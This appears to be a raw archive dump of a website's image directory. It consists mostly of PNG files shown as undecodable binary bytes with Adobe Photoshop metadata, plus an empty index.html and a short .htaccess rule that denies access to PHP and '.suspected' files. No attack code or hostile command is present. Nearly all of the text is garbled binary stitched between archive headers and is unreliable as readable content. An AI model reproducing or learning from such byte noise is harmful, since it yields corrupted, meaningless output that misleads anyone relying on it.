IHDR�6�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:51985863504E11E3A5F1D724919619F9" xmpMM:DocumentID="xmp.did:51985864504E11E3A5F1D724919619F9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:51985861504E11E3A5F1D724919619F9" stRef:documentID="xmp.did:51985862504E11E3A5F1D724919619F9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�p�M�IDATx��1�0���`P"��1��O�MvAz�P��i#�o$\/�.��{!��k\�?X]�����OӤ�ڶ���e�e�N7M�(��q��� ���J��)�!�M��m�W��(�pm�eY.7��-C���ދ�s�5�:�w 
�	!_�N��(de6��q�u��Z_U��s���c�[�s\��&�'Lb�IEND�B`�images/08/previous.png000060400000002154152434416630010630 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FA90D80759C111E3B4D69BC3BE0FC11B" xmpMM:DocumentID="xmp.did:FA90D80859C111E3B4D69BC3BE0FC11B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FA90D80559C111E3B4D69BC3BE0FC11B" stRef:documentID="xmp.did:FA90D80659C111E3B4D69BC3BE0FC11B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATxڴԭ
�P��m.�i�
lZ�=�~%����v�`�hj�4�y&� X48��38X;�_xV8{y� ,������Zf&����D��<��AW�oݥ6ʨ��*"7E�\ͅ�x��(I�&�l]S�-\QT���1���d#��v����FJ��a�NJ6R^���쥜5Q�)lE^�㠽4*��(�7)�i�Cg��b�9��8l���IEND�B`�images/08/next.png000060400000002212152434416630007725 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:B73A48B759C211E39979E3976F1BB419" xmpMM:DocumentID="xmp.did:B73A48B859C211E39979E3976F1BB419"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B73A48B559C211E39979E3976F1BB419" stRef:documentID="xmp.did:B73A48B659C211E39979E3976F1BB419"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>_W���IDATx�b,,,l���?��	��������@��q>���L �������}QQQ&>��R����_,,,����Z�Χ���Ȝ��\Q�e{3�������LȜɓ'�R�@.Ʃ.:���������N��fa�S��}����A�T�)(��Z�%1@^F�S����r~`���Q�ĉO��e����~���h�b`*݄ΧE>e����<���L�§:`,((��<���O�� �!�g�{�&IEND�B`�images/08/.htaccess000044400000000424152434416630010044 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/08/checkbox.png000060400000002001152434416630010531 0ustar00�PNG


IHDR		�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:3E4E4B2F504F11E3B48690A1733E716F" xmpMM:DocumentID="xmp.did:3E4E4B30504F11E3B48690A1733E716F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3E4E4B2D504F11E3B48690A1733E716F" stRef:documentID="xmp.did:3E4E4B2E504F11E3B48690A1733E716F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��uIDATx�t�m
� D�)H@��$ 	H@�r�X��x$Mw�G�����
�sn/�1�唘f���C�����,���"��p^��ŽF����Z�HJ�Q���[ ��'��M���IEND�B`�images/08/index.html000060400000000042152434416630010235 0ustar00<!DOCTYPE html><title></title>
images/info.png000060400000002641152434416630007461 0ustar00�PNG


IHDR�w=�gAMA���a	pHYs��(J�tIME�.0�O0IDATHK�ViLTW��j����icb�v
I�R+�U�-�b
�j)�("��PT*�M(̈Z�"[��dQG��� �޻��,ۦ?����޻��9���{��`�A�!y������W;F��M��y�뀏�;zC��}�]�b|�?K�_�b�}�������N���	��ǫsK�W���2����c�K|oL�R?P�'P��Z���FPH8�
T��n9J�}�����f<Wf�G���lm��6�
ry8���5��p��O�|���Z%!0U��\�-?�DWq>�5�H���7���t�%d�����5��Z����oB�ß�������:ݙ��+#��
HD�� �����@�
�@)���!�l�oֲĥcEޔ��训���y9��׹��8J.kځ[��$�T°��9��Y�K7�%oLyJ�m�&�3
��ӋYD�ɳi̺�&��@r[D��N3�h�W��;C�	�,"#Sɗ<%�)�O#�^�Y �<��@�� RE	���)E�6���Dry�!��aw.�w��	Nrm�Ϋ}��Hे"�&�����A'���O�u����u�aO>C+�q����IpM��1Q��>_E����!���5�j$�O|$01$�3���zk&�%p9��]
÷���Jh���q��`M�룟�
�E���{�S�'\���&�;�o��R:�F;*$����$�h���$�	�nE�	��K"�ܥG��LF5�Lz\�ʛO��2pR��]<�D�H%ל��.×a#n��
�,�Hw�*X��;�����'�[�y
&<�ayִ����<�}l�$�Ď��|�����N!/�`�c$���U?�aH�z,��!8M��ù�ƣ��u�x%ܮ*�c��S��QѬd"��1h�(}��9������W�A,��GQ��M��b"�6f��e��<�bH���mI9�i0�&>p?4L�ZIi�NY�7�eރX�M�%��`d߃��eZ�4��+��7Ɔ��J���%2+h��Ԓ�[P)!�T�����ح�]�c�S�]�7
����y٨�+0۪p���;G/�D�X��/�
b����a�s�;v�Ȧ:���K���z��9^�����E69��=U+aG�0,����>ؠ�<;5V���݋�J�ʵj��ea���6癩/]����<���o�zPuM�oҨ��r��Ĩ
��s7���>�8"�,y�p���ʯ��3�)*0��~�؆�՞����QG¸u�����x~�#��w��@��/15>BW!iIEND�B`�images/02/01.png000060400000002311152434416630007161 0ustar00�PNG


IHDR<T��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:1A8B4D1C210711E3B15AA707C349E642" xmpMM:DocumentID="xmp.did:1A8B4D1D210711E3B15AA707C349E642"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1A8B4D1A210711E3B15AA707C349E642" stRef:documentID="xmp.did:1A8B4D1B210711E3B15AA707C349E642"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>t�U=IDATx��V�j�@=
�d�M |-�E����?я��TW��P��Bc3B6Mh��L)�pf1�{�{��j�q(��/L� �dO{��@��R�t0��a��n�A罹���ǘ���y��y�uX�V��|�u]��<�i
Y�1�N�XUL�D��Gc�CM���2�"���Y�i�,;�z˲("�E�d2�6��8X�׿R۶�EQ@�f��9M�`�\b��\��K�#tY��8�!�"X��I�t]�v��͑!"s]I�@��A0�m��9%�I����]����{y��iW>�x�`&[0���uIEND�B`�images/02/checkbox.png000060400000001073152434416630010533 0ustar00�PNG


IHDR
Oy�sBIT|d��IDAT(����kQƿ;�G��L��#.L�NR���,$�G���ZnZ�V��U�7�]A� ��(���B\��U2�L����{�(�bl<��9��<���4�p:����ɤn�q�y�EM��R�u�Vۧ�~��J�N+��H�
���bQ���pœ���<�'<�O&�;���O2�b�D���x���<"��
���VVn���cB�D��B�E(}3`Y�q����N�Z���޾�y��M��G�ɶ�i��ц��W\b�����zCQ� �M"Is���˲h0|�i�F��ܥ����rB�@4�`�0.��-Y��E"���%UUe!D�s~�C���s0x�F��+��ǘa�p �X���L�l麞�t:�3�����^���^?`��a���/�nw/�o���+_��
!-�˟2����0rc?px�l6��8�X^Z��]������8�8���p�J�����9��w����T�ER��IEND�B`�images/02/0.png000060400000004302152434416630007102 0ustar00�PNG


IHDR��>E�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:72288A2400EC11E395E4AD2A61F727DC" xmpMM:DocumentID="xmp.did:72288A2500EC11E395E4AD2A61F727DC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:72288A2200EC11E395E4AD2A61F727DC" stRef:documentID="xmp.did:72288A2300EC11E395E4AD2A61F727DC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�"*�6IDATx���k��:`e	�K�����j��50�Q��6��=��t��R�;�q�J�e����L�2�J��#��~��������ۏ_y2җ[!�˔)��LW׊��Ly>g���WNC^4s>3����p�	��w'���W��r��|Ȕ�L��v>��|��5^��D��Y��8������!�	�����D�$.x~�2ہ�x4^A�N�L٦��w�Ap��'�-��)���F�a��8�Q��1a�MP�#,^�p�Oh{0���
��˜���k��a�:�p��F3,�̼R$�0?5�l��Z�M����&�ۈ�F�o	��0���LwE-.V?N,���� }��վV��R��칐��Q���GE,���֨�c����
w�G��	�;��ꉈ̕0�̓²���l�l��A�<jA�Z�j���YF�]
��x���cel	LQ1'��m
�Y���h���p�iwV4����h�ݣ>jM����C�XZ�B����(x���߃�t[^n�%����Ͳ���D�u�6’����bF{��P�g��D�6fGFgF.#D)ȓ֥ũ&_��W�6钃����v5%Jڃ'���=�r�q�K2�o+�Z.��F�g�z$~=�7�	��]5���-n�~/4�@�6j�ۆ�(�8(�(7���\��€}�	0��Q��3���.w	�6���ɱ�"�γ�ã�;�	������gb��^����@H�Fi�<���A��Яt4��r�۪_�X�S��H�Nȷ�^)x݋��J�|5>�r�[����"[ ��V`��բ�0|�7,���U8‰����0=��Q�����[���h���S,�Q�8:����`���_���~
�g�B��([bt������P�_k��k���^�]�0k�è5�V(]-�{7�Z�}�5���#����*j:���$���ޮ������;:`=*�l��*�g[�u@Qf��TP��ŗ\[8�ݾ�/��w0z����j��V�_�h�����3*��`�m��F�@�rY��%���5j��`�%��h�Q���O�kP�`������ԇ���5��ں�^�w�f�`zT���e�^�^�SY8���m��[�������ʼnb�N�/6\�T�_�v��L�m�Gm�X)^=�k9
�VP����j��9�Q`�Ɔ�h�}�<�ܺp^��U?w����-�z�fԬ���[`�Y�S_��?$�c��B	����V@�h�s/���H~nO}����b��qnWϋ?�`��0sW\IEND�B`�images/02/next.png000060400000124122152434416630007724 0ustar00�PNG


IHDR�7ن��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:35352A435B5D11E3BA108317F61319F0" xmpMM:DocumentID="xmp.did:35352A445B5D11E3BA108317F61319F0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35352A415B5D11E3BA108317F61319F0" stRef:documentID="xmp.did:35352A425B5D11E3BA108317F61319F0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>BI�C��IDATx�\�[�m[v�/c̹�>�.�)J(
W�\��Vx1/�@��-��$�ʎ�AA9�!y!"

�%�~�����DL��:g�朣���]Z�p�����e�>zo��}�k�_���֒rO�����R�-Ք�iji�<_FJ��#}���떮�O����/J�)�����26?f~VO��S���������k:�#���Sw|��1�?�#�r)���8R��[��7�{Zڶ=���Y�n�+�g������)���?�{�הK���N矞�|i��<�}��]��2_7_�F���_�����H��)]�=�ޮ�k��\���ۇ��;w�������������y߸�m�s�f�׵�q���n����s����������`�[������Ǽ�y�����l�������~^�(���NJ�ݯX�y\
����ז��|���>��Q��=1�uõ�/���ϰ��g^���o��Ա��y/m~6?��k�Ѻ����*�j�����{طK��5�r�wCk�U���z�g���z��ܷyo��ϰ?��5W^���c/g^��q��f\��|�|�s�n��}���e�s�>��3��I{��>y}�{o����y��m���3���,ZW�$w�	=�����%�{��L�;���oos��5��u^W�k�����9�}x�g�/�\�2����{Թm�N<I\3��v�=u�$�u/�M��م�����{;���g&إ�"�ő����X�6���{0�uƙǾM���Ͽ\��g0m�{�����������:�H�k/�Y~����<��m���w�؇��>_�Y����|�����ݼ�8��{k4�1Wk�Ͻ�N�;�9װ�N`/��\��p^��`���q\����1<��k�ߚdF��F�aS�/�(읏ϴ�E6�~���q�g��Ǽ���8}�ɕ�����\��XƘϑ�Ԇ��B�#���9�g����i�`��vs���5�浼�=h��r�6����?x��|������&���z�{�+_����c��!�Q�/�]�?��,�7�g����|�T�^=Z�`��C�|V��Ϳc��v��˼Ol�Go����sh�L�e���.y��¡+���/����2�h���9
[�����dlp�Z��.�!�r��	y`�s����@�v�((.|�1,�F8�y:�im��@���
F�4���a�gM�5ٙԭh�R�j��Ϩ0�3xO>~��{����E7˩���&ٯ�N}`g'�Rlܧ��m6��F|�1?�}?~v���
=�F������+�����ˊ�끅�Zck^gٸ�����8a��ً=��l2S��|���!�N�3��,�YQI��������F<�sO`�f�Y�u������>��}�K�e��>��7�kU���<�
B`Kw����?���9aݶ��N'��V�
5�2���E� s/���t��+Xt�z�vZ���x��?Y����&J���c�K+\{��W�5���|$��s�#�qd����0p��b<d7��s����@o<�����*�\�lxDoʪ��<�L�nĵ��Qd���U�ƹ\�d�+�F��mk@�$l\B;k�{"�������]<?e�qھ��:�w �5�Y��O�� 3E8�E%'3�F �K���V�u�5'�Ӕ�U�|��e W�MS��s����+ٙ0Q������2}�\��5�|>�ù^�h�r†��9��#��)�0+L��6���	$�w��+�ϕN|���qc �Ŷi_19�?;:�Bð?�y����o��~�S�Ѭ��4־�r ����N�le�?��	b?���)`���s��z�5|A�ߡ���J^<�^w�e�\���<s��Df]���
Y .
�
�7R�a�E������C4|P��s8Da����Pf�����o>��y���(�����w>�mnf���Φ�0;�"�&eq+��C?��ȌyFo��~�_���f环R����3���U�v��xM����Axs�,#t��T6�69�Ff����5޴֏�'6��q�<�_�d頁���vB��Y�f$��GԜ���NC�[_�jOz�#hvb�(�Oߑ�G��Xk��(�ee���A��G�.4��;�U�̤���U���$��"؄t�������3�W�Ao̜�/���p��|�}���@W`�Ȍr8@"��{��eF�/Fg��|��r�;���f~�>3�l'=�A��y�%{-羁��Bj`��#����	]�>�3:=ѻ��Rd�>�ř�h�;�a��DkZ���8�$
{��yk�uD�������p�.%���ho�Y�� S�ujC��f'�qs��s���x��9�~��18y�i_2�Ai�6�OePٸ�qC���KW�3r��t���eW�'�
|?j�UgkX+O�>��c��[���L?K��D0�I�;�����o��Ȇ�:lZ>;�
�i8�`��Y1�� ���E�|��Y�z+�!��G{L�_�ef������3k9�~�A�6�R�k_�`{b�Y��'�Oq��g��1�&�#�k,6yϤ����,>?���Q	;������t�����}W־�{�X �����}����A���:I�sӌ�4C�(�0�"�3�k���A'L��&`^\( oFR�-Í����{zL��C
��nl�ԼEP,���9y�k�:��hk'^a	B���Tӹ�^�63��4�w��`b8�y-�r�q�cݸ�C���C]d(˝.�rvƂ�����-?n�A�	��#㞑 #F��y�I!b�6�Z�l�DAQ�q��������
�
6m�SP�7�I!Cf0��(�ࡱ��������k�njz<�������M:&��p8�i�]Ee�;�]ΛƢ5�q ��d�z��Y"���#~�@p���#상��#sk
T6>�ݙk��7��
{�{"+S� C��1��z��>�z�4Ng��P�Ƣl{�u�ζ��u��`���y��һO�<�sh
X�2�4�����<\����?�%B���B�$��UT
�.���=�|��J�ʱ���
�
��=[
h\e:����e@�
����(XÙ�rL��˄��n
j
�v8Dg
�=�M�U�.1�G�"��p6���hH7�R��t
���l�r?'q�֞�s�5ŵ�j�\GY3��Ѳ`���_%S�Xe����q9)�9گ�Y�~o�n>0�8%m�e�J�lL�{���A[�k+�"
㤮��qn��NHQg��ۋ����p�,c�\��(��	Mg���r�n0x����7�)�s�m��Ef.ڧY	B�}���=�3<N)J�1t,�u E����3�����m3��F�+��f�2��Wo�>NGOx���P..j���4��N��)2;y��w����=Yp9�[8��q�&%��CG������`���:
2��l,�%4!�l���[�Fǁ?�tt\7L�h�+�)[r^�&S�єy#{������~A�!���,?��Q��C��L���wCn�8"��2��YWCV����;J�^�a��WpL��g]r�3o���]G,��0S�6>:b�X"���#��k�xE�DH�l��¡���RC"נ2�����3���������"��`>g.G�q�.�Y�ԟ�֬:x�Ð���d�� ���+����x�Rf�G��Q?oF>�p)��~��U�)�O�\�Tf=��֪��}�������,W<n�Ł3v���_���i�Z$XN�?ۡG-q���e
��Ɛ(�OG Ā�uO��܏�=M=ye�)U����8Ma6��\��N<8!>SD��3 ��Nv��y��.�
�Wڀ���}��������=���dsHP�D�s�D���rJ�cTY�� !��%��=�Dx(��*�(��s��4a�sC�sݕj�3���t����kog%�زi�9�i^ȵ�{(w���v�.�T�(-��P�x�`"i����h=�M��f�h������b^N�ADt����.�����޵1�m&���m�몂�;��JFy�|	���0ʥL��d3�����»!�(H�1�U�Y�*;l��v����ùcc���_��L��-2��!I~]q�Y��5�'`8�}��tXWAj�T0`���&�x&D�j���e^;����t�mn�v(+ ��Ñ��uWT=��s$�9���9��`m��]$�M2�`�IV��͑w9��T520�D6Q��H$!��\3HV��	�S�"��]����`�I�	�j�m8h���G�D/�8L:S-P�r3����An��ZM��v�p�İ�J���0�,v_�5�
�d�+ļ��Wel9 ��rCf�HYAC�fdWP��1isP���׽���(VN�q��E�����0)`�k��Z
}�|UA���'P�IA��=a8~ܛ�w�5�P�t�-b��|�ȸ���.V����*+cO|���n��N�s=�Q�����E��ه��dT���*�;͜�ZV=�YM.D"�N��	�"�f��h��Ђ����Ah�$f�s��>��5��\�0�>�zo>�"�!�
å�� ��_�_E��(�.�8pȎ[_��y5�y%##z��av����ǂ9�,�)b��T���M�ijK.)�Y|}K��3�r�/P6��z��8D���pk�o"쒛��u>[|V M��(ɦ��C�-��	l��`�i����du���D`O�<��nrrw��L��v�s)t~�ǻ��y!U�1?���l��4B��[^���4H��;os	����9\~Qٱ,?�]�FOZ�}��˘��l2dE�>�Λ��>6�懔V�7s�SQ~FT��"�k�ή�T.g�I���Ƈ�QB8�ƭ��@��g�!�y���P��������Z�f�bw6��H�`�Z��2�n�=b8�q�<t�w�X�N�:?�1|x�+^-t4�,�~��2Q�6��<	����D
�l��i=ȏ�#��uf�]�A6��x7�
�� �qk�xl��dC�����3����2�!r���
!��2k��	t�%�<\�6.��j�3+'d�(@���
��{AH#{�G��g
2�">?D�8(�m$�˂\�~�0 �/'��P4=��n�q��mG�U�t��%�oo�/�2��BD���z��it2Σ���:��h}o�ύϺݴ'����b�
/wg��pM>ž�ݎ�9�n��O�[��k6L(ǀ{R}�Y��*��z����Q�!@gQW��1��͵\s1����@M\b`��PJta/��#;5'�,XE�/��^E�Dٴ�Jb,�)9\�P�8�"Լ�?�Ca��#�F �z�K��q���8w�YpN��Vu��E�+䔤&�Q@�:'M�ڤOs>Z�����`�?���r.�"�;��]6=Y�Ce�l�Ǒ�!2���� �m�	���*O�����Ģ�nE4.�o:d��!�/���L*��kG�T���.Y:,QP�O������,oq`'JwB5���:x�C�r�J��. `d����{a��D<=���'9y���6ڶ<__G;K1�un������&D��#�dT�)��v/#+Ȼ����	���'�E��/����ϴ�Z N0���"*}7�CBg�r�Țd$HA�"�	�>0w@sG����pђHEMQ�|أ�h��)Q��=��y7�G>@]�m ������l��
HS��ރ	8
V9#��V
�x4�����07��G����_|�ٌ�~����/��Eߑ9`>l���ϝr���"H��TMa}�P?ORMA�dH^����
���0���,%pjע���!^s͹�U���E���?#>���b���R6p2c�	>)�Y�kV"��i�6��v}�������_P_s-��b�P�`��a�J!%�&Z)��tkA
b��DK���{����Ʀ��r}�Ֆ]c�1�5�Ҁ�l⼼�����UP5d�I>tM�{?qŰ^UD'z�YW�������AOH�c2ӄ�l�絉k�'�)8�[��
V/�/��ϭ�v�\��!Ⱙ�K&oѼ��Ww��^VݍP,R&��-7h�zy}Ew(�592)��!Jb�1��rϥ���X�*�UJť
3��R]?y��ט��h�����y�'Ilj�:�.ۗE�Zm�*騢b2d�Qp*y�=0G�2��UH��n�J�\h�
�˸Ƿ�؞�F��'z��z!	@��V�����H.yP�)p(H�����Ӷ>�����tE7M�}ڗ]X�������H�QCPK��Y��\w��9S�6Tm_�so"Wg��(��u��џ��s1tZ�&���f�=�:d�l7"\&�{�B�-� �`V_��[�GD�RՂǎ��`�h�$�,c���d>c+�ɜ~��g�� �]r1��b�c�<�T��bS��=�Һ���l]�QN����ւ+$�?[���FR�F�y�5���D�l�h��,��o�U��]�3�`�e������vU��x"T+V�]�Ǯ��C��p�
�k���^�†gČ&�D����L5�6)9�'xn1��H�Z�H?m�H3IuQ���`�C=���৺�S�Ӑs�#�!d�
�;��JD�E��2�|�m�nR^�brFDCp(��þbF�1����l��7Nh���Y�oP3��4*Yy�H�����3�k^Qt\�Q��8����z2[�v�/���UT�p�ɱt�eoLxX��Y<^&���h�ْ�+��[0a#���a��+C�\�����Z�T&�E8�d~7���t���r���D��D"�1搴��PO6���<@�}<�IRUݕ�Nt8PSe��9PG���@.X�Uܲ�qN�ъ����|��w~e�!/N�j�C�#�J��ʼ�&Y��.z�I��w�N6�ϣ��"N���|/�(�x���#e	8G�#�DI'>�P��X�`���A��a��8���r%1�B�ZJ��0��lchPÁ��bm�n�x�\��/I���-K��ͯ��G�%� F�|H�Ҏ�/�-�G)H2��&U�>�R�vF�D�bw'�8����(iD���DQ�f�F���V�M��ݽԸ@�>���V	�w���8S���桏~,�Oc�����v�wX�.�C�xk�1�!^�ծ��X��?@���͇mĺX��2_7���v��D����PLso�Φ����_�*ebv������{�!z��
N$�M�	<�E�ԑ�_���R��nEw��l4$q����U�4��jf=����f��)���aQ����I����K��Vw�H>ٱ��f�Ϯy0���j2E��@["�va�@j쉺�f:����`$l��e�l S���\	we���v9��6DB��D��9�ӱ�	�3�`�4�*;Q�5�k.�ѝ��d(��q�bO��I���*B&�H
�I��e�}�c���U�TXRB��?��*��nt��U���'��^-_�Y�a�̖�!�H���Oe�@_��`F�/'��cO�P�w��H����#��֣��b��k������)��;�K�n��̰��6����P�tt���7�{<2-��%�%�3V�fDn�B�7��s�$,&�0�e�:��ļ��J�b2Oj���\�d)ȹ���e�*��a��s
Fy3O�~��߫!^;`�wO$+�{���iDD��ߔE�F�L��]����ݦ��z��j���=��2�A촰St�@زk��v%j�gE~Ѕ�b"��Ȥ/8x�3�?~����7~��!�}���Щ�S~Ԭz#$�b�a�T�͘e���p_O��^�/ص��[L�>�Y���
�!��3�r+�+'�A䈦L�JP/t�o�U�X]��U�M�f@H�v8k�k�B�Fn>�Y,�j>#ݎ;
C���0j>L�j�2K��.\�X}����&�(�S�e����N��kE�$|�{���v*�P�l�x��ܠ�ӻ�O�Jx�c��U#M�i�e����?U
AHmx"��{G�or��uon��e��%g7����C��Y@��-2��ݟ,�����ꁷ�
��ݰg������ߣ��M�1��$�̍lg]�w���)묡&T���[M��f����!��U�kf�f�t�9��Q��a�4
v��u�a�3kCP�"�?T��#�Jh�%���=B9\n�H����b
<�;�������뼏�P l)��.�D_�[��J�+�%K�#��ge�ǃAg� $�LY�?�xF)F-�A���>�Y�^$'�C��^�*�;ۚVGI�&�D�!�H-�U?ȶ�}u��%:�(�r�}ם�׈��P�9
%j���3����2
�~�-j�2�L����hs���d�JC5.e�CLrZ�j�� P���,�ui����	��=}qˁ��Μuz 0�` ��;�Pv��Kڭx��X�en�3m��=��	[�2%�(W�m��H�2ŏ�k3&ر.S��^�U��x���Ѽ�!F�ܝ{H1�����1�z����͟���n��z��/����?�'��?�.���*ݖ�0��u�$�r����S�j.�d�AEb̤��*�w���-�A�a�U�����bwv�WMvY�6+8fd"I��sJ�	�?�h�S�H@�c�����jc�L�;�ؠ��Ĝ�
��Y��l��k�P:r�)V���PW3xf�c���5�mXf��4C�R���U6�Hn$&��`]���N�<ף���(�aL.�u����l���21�/@J��ypH
����6�87��0�C]2�m�u�F�C�&�	����MV�Z"ffgv��Q���Pk����J$+�P�ڨ�͂\
�R�SeI�5�����`��n�� ��HT#���DǬ\wwm����#��&��XN��!���2�����hV���N�쨄�[�=�\[C���[��1�r��d7a�{`�oH�l��+)�jT����V0?,��R��xQ�qfD�%���]\���u��(w�d�f]uz"�o�S]�뼰�3�D�T�c0�xX8G(�
�79k�,�������QA+n�f�WIa���+J�oS{��So�v	�Z���=�� 2�W"/���E�vK3IJ<��y���YfL}S��N��b�9��ł�^���c�䓗i�^���=�@��&'��[?������Wb[%����	���9&7Ab�Љ���D����k)��F��2eG�Y�~f������X��e?�p���:�����������\�׾�o��[����_����'������I�ƥС@\��Ꚑ�
�C��wq���ꝺ��c�;j�IH�맜_��Nb�if!y�!��-�K@^:���x��E�N\�vsW�`҆6c���'ՠ��jc�ʨ>4�m��v��ۡ,�jb΂�!.BW����5|ҚՐ�b(���fǮH��fZC�)��D��m�2���V#pi):�u��a��v�.�(�2T'�x�Aʪ��?0�4[-�Qd1�md&��yR{x(�K��>���T�B6du�b67<xPNV�2�a̱ZF���a�B"Rս�I43�PVd��~<ۋ[oF;�P<1������^K�m�K5�/�s{�h���,j8�b�A�f�,c��%�m6VT7��PV+J]z�c�J"�*�I�uѦ���6�˩�f좙��*�B;���Ud�=r���n�!�;�z�'��ҕ/���U��d3�]�~`O)��>\�`���;X���R�K�jԾ�����ΉMo�@y.�I���ÀB��YYȳ6��M�ѥlVjΎ��'��P��n�����Sxg�������0d~#��aAX��n�M"�XD*x�Ѫ%�{���Z�P�~HY-��x�C�n�=������F�j[�T�?Z�ĐH7�I��.E8B�%[c@]�qs�}���#�x��<�$�Zd�2�.��sAܵx��,� ����Y�	�\�j�����t���҂[Y���կ����ʯ��o�����w~T���������/}����̿�#|����W�����SBS��~o:�i-2�����`��d�֬�s�uիw��|��@<��v3G{�2<x�aiz����Dv�W�P	��8>4��Δ����
D�q��BP���=��a�maE�����㮀b��0w�h
